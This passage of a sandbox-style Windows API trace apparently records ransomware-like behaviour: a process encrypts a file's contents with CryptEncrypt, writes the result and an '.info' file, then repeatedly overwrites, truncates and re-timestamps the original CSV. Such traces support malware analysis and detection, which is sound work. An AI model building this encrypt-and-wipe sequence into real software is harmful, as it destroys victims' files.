returned 1 [0071.010] GetFileType (hFile=0x300) returned 0x1 [0071.010] ReadFile (in: hFile=0x384, lpBuffer=0x2280ca0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5c828, lpOverlapped=0x0 | out: lpBuffer=0x2280ca0*, lpNumberOfBytesRead=0x1bf5c828*=0xcbd1, lpOverlapped=0x0) returned 1 [0071.012] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2294cb8*, pdwDataLen=0x1bf5c880*=0xcbd0, dwBufLen=0xcbd0 | out: pbData=0x2294cb8*, pdwDataLen=0x1bf5c880*=0xcbd0) returned 1 [0071.012] WriteFile (in: hFile=0x300, lpBuffer=0x2294cb8*, nNumberOfBytesToWrite=0xcbd0, lpNumberOfBytesWritten=0x1bf5c818, lpOverlapped=0x0 | out: lpBuffer=0x2294cb8*, lpNumberOfBytesWritten=0x1bf5c818*=0xcbd0, lpOverlapped=0x0) returned 1 [0071.013] ReadFile (in: hFile=0x384, lpBuffer=0x2280ca0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5c828, lpOverlapped=0x0 | out: lpBuffer=0x2280ca0*, lpNumberOfBytesRead=0x1bf5c828*=0x0, lpOverlapped=0x0) returned 1 [0071.014] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22a18c8*, pdwDataLen=0x1bf5c7c0*=0x10, dwBufLen=0x10 | out: pbData=0x22a18c8*, pdwDataLen=0x1bf5c7c0*=0x10) returned 1 [0071.014] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22a1918*, pdwDataLen=0x1bf5c7c0*=0x0, dwBufLen=0x10 | out: pbData=0x22a1918*, pdwDataLen=0x1bf5c7c0*=0x10) returned 1 [0071.014] WriteFile (in: hFile=0x300, lpBuffer=0x22a1968*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5c748, lpOverlapped=0x0 | out: lpBuffer=0x22a1968*, lpNumberOfBytesWritten=0x1bf5c748*=0x10, lpOverlapped=0x0) returned 1 [0071.014] CloseHandle (hObject=0x300) returned 1 [0071.015] CloseHandle (hObject=0x384) returned 1 [0071.015] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0071.015] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0071.015] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0071.015] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", nBufferLength=0x105, lpBuffer=0x1bf5c280, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36", lpFilePart=0x0) returned 0x5f [0071.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c760) returned 1 [0071.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\835bdbff3355d2f94c10658824f9dc36"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.015] GetFileType (hFile=0x384) returned 0x1 [0071.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c6d0) returned 1 [0071.015] GetFileType (hFile=0x384) returned 0x1 [0071.016] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.017] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.018] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.019] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.020] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.020] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.020] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.020] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.020] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.021] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.021] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.021] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x1000, lpOverlapped=0x0) returned 1 [0071.021] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0xbe0, lpOverlapped=0x0) returned 1 [0071.021] ReadFile (in: hFile=0x384, lpBuffer=0x22a3088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5c848, lpOverlapped=0x0 | out: lpBuffer=0x22a3088*, lpNumberOfBytesRead=0x1bf5c848*=0x0, lpOverlapped=0x0) returned 1 [0071.021] CloseHandle (hObject=0x384) returned 1 [0071.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36.info", nBufferLength=0x105, lpBuffer=0x1bf5c000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36.info", lpFilePart=0x0) returned 0x64 [0071.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c4e0) returned 1 [0071.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\835BDBFF3355D2F94C10658824F9DC36.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\835bdbff3355d2f94c10658824f9dc36.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.023] GetFileType (hFile=0x384) returned 0x1 [0071.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c450) returned 1 [0071.023] GetFileType (hFile=0x384) returned 0x1 [0071.024] WriteFile (in: hFile=0x384, lpBuffer=0x22af780*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5c5b8, lpOverlapped=0x0 | out: lpBuffer=0x22af780*, lpNumberOfBytesWritten=0x1bf5c5b8*=0x77d, lpOverlapped=0x0) returned 1 [0071.024] CloseHandle (hObject=0x384) returned 1 [0071.025] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c870) returned 1 [0071.026] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), fInfoLevelId=0x0, lpFileInformation=0x1bf5c950 | out: lpFileInformation=0x1bf5c950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb96f4d0, ftCreationTime.dwHighDateTime=0x1d4d0ad, ftLastAccessTime.dwLowDateTime=0x6820ed50, ftLastAccessTime.dwHighDateTime=0x1d4d10f, ftLastWriteTime.dwLowDateTime=0x6820ed50, ftLastWriteTime.dwHighDateTime=0x1d4d10f, nFileSizeHigh=0x0, nFileSizeLow=0xcbd1)) returned 1 [0071.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c830) returned 1 [0071.026] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.026] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", dwFileAttributes=0x80) returned 1 [0071.026] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c8b0) returned 1 [0071.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), fInfoLevelId=0x0, lpFileInformation=0x22b73c8 | out: lpFileInformation=0x22b73c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdb96f4d0, ftCreationTime.dwHighDateTime=0x1d4d0ad, ftLastAccessTime.dwLowDateTime=0x6820ed50, ftLastAccessTime.dwHighDateTime=0x1d4d10f, ftLastWriteTime.dwLowDateTime=0x6820ed50, ftLastWriteTime.dwHighDateTime=0x1d4d10f, nFileSizeHigh=0x0, nFileSizeLow=0xcbd1)) returned 1 [0071.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c870) returned 1 [0071.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c7a0) returned 1 [0071.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.074] GetFileType (hFile=0x384) returned 0x1 [0071.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c710) returned 1 [0071.074] GetFileType (hFile=0x384) returned 0x1 [0071.074] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.075] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.075] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.076] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.077] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.078] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.078] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.079] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.080] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.081] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.081] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.082] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.083] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.083] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5c8a8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8a8*=0xc00, lpOverlapped=0x0) returned 1 [0071.083] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.084] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.085] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.086] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.086] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.087] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.088] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.089] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.089] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.090] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.091] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.092] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.092] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.093] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5c8a8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8a8*=0xc00, lpOverlapped=0x0) returned 1 [0071.093] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.094] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.094] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.095] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.096] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.097] WriteFile (in: hFile=0x384, lpBuffer=0x22beeb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5c8d8, lpOverlapped=0x0 | out: lpBuffer=0x22beeb8*, lpNumberOfBytesWritten=0x1bf5c8d8*=0x1000, lpOverlapped=0x0) returned 1 [0071.098] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c908*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c908*=0) returned 0x0 [0071.098] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c918*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5c918*=0) returned 0x0 [0071.098] SetEndOfFile (hFile=0x384) returned 1 [0071.099] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5c918*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5c918*=0) returned 0x0 [0071.100] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c710) returned 1 [0071.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c680) returned 1 [0071.100] SetFileTime (hFile=0x384, lpCreationTime=0x1bf5c978, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0071.100] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c710) returned 1 [0071.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0071.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5c680) returned 1 [0071.100] SetFileTime (hFile=0x384, lpCreationTime=0x0, lpLastAccessTime=0x1bf5c978, lpLastWriteTime=0x0) returned 1 [0071.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", nBufferLength=0x105, lpBuffer=0x1bf5c230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv", lpFilePart=0x0) returned 0x4d [0071.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5c710) returned 1 [0071.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YlFbY0GE9kU8pLG\\MNCF5miF\\gV5tp3PFjr.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ylfby0ge9ku8plg\\mncf5mif\\gv5tp3pfjr.csv"), dwDesiredAccess=0x40000000, 